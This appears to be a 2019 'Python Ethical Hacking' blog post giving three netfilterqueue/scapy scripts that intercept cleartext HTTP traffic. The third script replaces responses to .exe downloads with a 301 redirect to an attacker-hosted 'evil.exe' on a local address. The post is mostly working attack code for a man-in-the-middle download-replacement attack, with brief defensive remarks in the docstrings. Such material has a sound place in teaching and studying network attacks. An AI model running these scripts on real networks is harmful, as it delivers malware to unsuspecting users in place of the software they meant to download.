Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(1)

MODIFYING DATA IN HTTP LAYER

 

  • Edit requests/responses.
  • Replace download requests.
  • Inject code (HTML/JavaScript).

Modifying HTTP Requests on the Fly:

#!/usr/bin/env python

from netfilterqueue import NetfilterQueue
from scapy.layers.inet import IP, TCP
from scapy.packet import Raw

# TCP ACK numbers copied from HTTP requests that matched the filter in
# process_packet. A server packet whose SEQ equals one of these values is
# treated as the reply to that request. Entries are removed only when such a
# reply is seen, so unmatched entries stay in the list.
ack_list = []


def process_packet(packet):
    """Report cleartext HTTP requests for ``.rar`` files and their replies.

    This version only observes: no packet is altered and every packet is
    accepted.  A request is recognised by the substring ".rar" in the decoded
    payload of a packet sent to port 80, and its TCP ACK number is stored in
    ``ack_list``.  A packet coming from port 80 whose SEQ equals a stored ACK
    is reported as the matching response.  Both checks rely on a readable
    payload on port 80, so traffic protected by TLS is not matched.
    """
    ip_pkt = IP(packet.get_payload())
    if ip_pkt.haslayer(TCP) and ip_pkt.haslayer(Raw):
        tcp_layer = ip_pkt[TCP]
        if tcp_layer.dport == 80:
            # Client -> server direction: inspect the request text.
            request_text = ip_pkt[Raw].load.decode()
            if ".rar" in request_text:
                print("[+] rar Request")
                ack_list.append(tcp_layer.ack)
                # show() prints the dissection itself and returns None.
                print(ip_pkt.show())
        elif tcp_layer.sport == 80:
            # Server -> client direction: correlate by sequence number.
            seq_number = tcp_layer.seq
            if seq_number in ack_list:
                ack_list.remove(seq_number)
                print("[+] Replacing file")
                print(ip_pkt.show())

    # A verdict is issued for every packet that reaches this point.
    packet.accept()


# Register process_packet as the callback for netfilter queue number 0.
queue = NetfilterQueue()
queue.bind(0, process_packet)
try:
    # Blocks here, passing each queued packet to the callback.
    queue.run()
except KeyboardInterrupt:
    # Ctrl-C stops the loop; print('') just emits a newline.
    print('')

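Browse to a site served over plain HTTP and download a .rar file; the script prints the matching request and the response that answers it. Traffic carried over HTTPS is not matched, because the payload the script inspects is encrypted.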

 

Refer to the list of HTTP status codes when choosing how to modify the response.

https://en.wikipedia.org/wiki/List_of_HTTP_status_codes

#!/usr/bin/env python

from netfilterqueue import NetfilterQueue
from scapy.layers.inet import IP, TCP
from scapy.packet import Raw

# TCP ACK numbers copied from HTTP requests that matched the filter in
# process_packet. A server packet whose SEQ equals one of these values is
# treated as the reply to that request. Entries are removed only when such a
# reply is seen, so unmatched entries stay in the list.
ack_list = []


def process_packet(packet):
    """Swap the reply to a cleartext ``.rar`` request for an HTTP 301.

    Requests are recognised by the substring ".rar" in the decoded payload of
    a packet sent to port 80; the request's TCP ACK number is stored in
    ``ack_list``.  The first packet from port 80 whose SEQ equals a stored ACK
    has its payload replaced by a redirect and is written back to the queue.
    Every packet is accepted afterwards.

    Defensive reading: the match needs a readable payload on port 80, so it
    does not apply to downloads served over HTTPS.  On the client side the
    effect is a 301 for a direct file download whose ``Location`` names a
    different host than the one requested; checking the publisher's signature
    or hash of a download does not depend on the network path being honest.
    """
    ip_pkt = IP(packet.get_payload())
    if ip_pkt.haslayer(TCP) and ip_pkt.haslayer(Raw):
        tcp_layer = ip_pkt[TCP]
        if tcp_layer.dport == 80:
            # Client -> server direction: inspect the request text.
            request_text = ip_pkt[Raw].load.decode()
            if ".rar" in request_text:
                print("[+] rar Request")
                ack_list.append(tcp_layer.ack)
                # show() prints the dissection itself and returns None.
                print(ip_pkt.show())
        elif tcp_layer.sport == 80:
            # Server -> client direction: correlate by sequence number.
            seq_number = tcp_layer.seq
            if seq_number in ack_list:
                ack_list.remove(seq_number)
                print("[+] Replacing file")
                ip_pkt[Raw].load = "HTTP/1.1 301 Moved Permanently\nLocation: https://www.rarlab.com/rar/winrar-x64-571sw.exe\n\n"
                # The stored length and checksums describe the old payload;
                # deleting them lets scapy recompute them on serialisation.
                del ip_pkt[IP].len
                del ip_pkt[IP].chksum
                del ip_pkt[TCP].chksum
                packet.set_payload(str(ip_pkt).encode())

    # A verdict is issued for every packet that reaches this point.
    packet.accept()


# Register process_packet as the callback for netfilter queue number 0.
queue = NetfilterQueue()
queue.bind(0, process_packet)
try:
    # Blocks here, passing each queued packet to the callback.
    queue.run()
except KeyboardInterrupt:
    # Ctrl-C stops the loop; print('') just emits a newline.
    print('')

 

Intercepting and replacing downloads on the network

#!/usr/bin/env python

from netfilterqueue import NetfilterQueue
from scapy.layers.inet import IP, TCP
from scapy.packet import Raw

# TCP ACK numbers copied from HTTP requests that matched the filter in
# process_packet. A server packet whose SEQ equals one of these values is
# treated as the reply to that request. Entries are removed only when such a
# reply is seen, so unmatched entries stay in the list.
ack_list = []


def set_load(packet, load):
    """Replace the Raw payload of *packet* and clear its derived fields.

    The IP length, IP checksum and TCP checksum stored in the packet describe
    the previous payload; deleting them lets scapy recompute them when the
    packet is serialised.  The packet is modified in place and the same
    object is returned.
    """
    packet[Raw].load = load
    stale_fields = ((IP, "len"), (IP, "chksum"), (TCP, "chksum"))
    for layer, field_name in stale_fields:
        delattr(packet[layer], field_name)
    return packet


def process_packet(packet):
    """Swap the reply to a cleartext ``.exe`` request for an HTTP 301.

    Requests are recognised by the substring ".exe" in the decoded payload of
    a packet sent to port 80; the request's TCP ACK number is stored in
    ``ack_list``.  The first packet from port 80 whose SEQ equals a stored ACK
    is passed to ``set_load`` with a redirect as its new payload and written
    back to the queue.  Every packet is accepted afterwards.

    Defensive reading: the match needs a readable payload on port 80, so it
    does not apply to downloads served over HTTPS.  On the client side the
    effect is a 301 for a direct file download whose ``Location`` names a
    different host than the one requested; checking the publisher's signature
    or hash of an executable does not depend on the network path being honest.
    """
    ip_pkt = IP(packet.get_payload())
    if ip_pkt.haslayer(Raw) and ip_pkt.haslayer(TCP):
        tcp_layer = ip_pkt[TCP]
        if tcp_layer.dport == 80:
            # Client -> server direction: inspect the request text.
            request_text = ip_pkt[Raw].load.decode()
            if ".exe" in request_text:
                print("[+] exe Request")
                ack_list.append(tcp_layer.ack)
        elif tcp_layer.sport == 80:
            # Server -> client direction: correlate by sequence number.
            seq_number = tcp_layer.seq
            if seq_number in ack_list:
                ack_list.remove(seq_number)
                print("[+] Replacing file")
                redirect = "HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.0.43/evil-files/evil.exe\n\n"
                modified_packet = set_load(ip_pkt, redirect)
                packet.set_payload(str(modified_packet).encode())

    # A verdict is issued for every packet that reaches this point.
    packet.accept()


# Register process_packet as the callback for netfilter queue number 0.
queue = NetfilterQueue()
queue.bind(0, process_packet)
try:
    # Blocks here, passing each queued packet to the callback.
    queue.run()
except KeyboardInterrupt:
    # Ctrl-C stops the loop; print('') just emits a newline.
    print('')

 

 

 

posted @ 2019-09-04 22:22  晨风_Eric